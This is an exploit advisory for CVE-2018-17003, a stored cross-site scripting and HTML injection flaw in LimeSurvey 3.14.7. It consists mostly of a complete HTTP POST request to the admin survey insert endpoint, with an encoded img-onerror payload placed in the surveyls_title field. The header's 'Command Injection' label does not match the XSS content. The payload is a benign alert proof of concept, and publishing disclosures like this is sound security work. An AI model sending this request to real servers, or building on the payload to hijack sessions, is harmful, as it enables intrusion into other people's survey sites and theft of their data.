LimeSurvey 3.14.7 Cross Site Scripting

LimeSurvey version 3.14.7 suffers from cross site scripting and html injection vulnerabilities.


MD5 | 124babb32873ccb923bdcf3a1cbf33e1

# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS
# Date: 2018-09-12
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.limesurvey.org/
# Software Link : https://github.com/LimeSurvey/LimeSurvey
# Software : LimeSurvey 3.14.7
# Product Version: 3.14.7
# Vulernability Type : Command Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : CVE-2018-17003

In LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert.

# HTTP Request Header :

POST /index.php?r=admin/survey/sa/insert HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/index.php?r=admin/survey/sa/newsurvey
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1171
Cookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D
Connection: close

YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1

Related Posts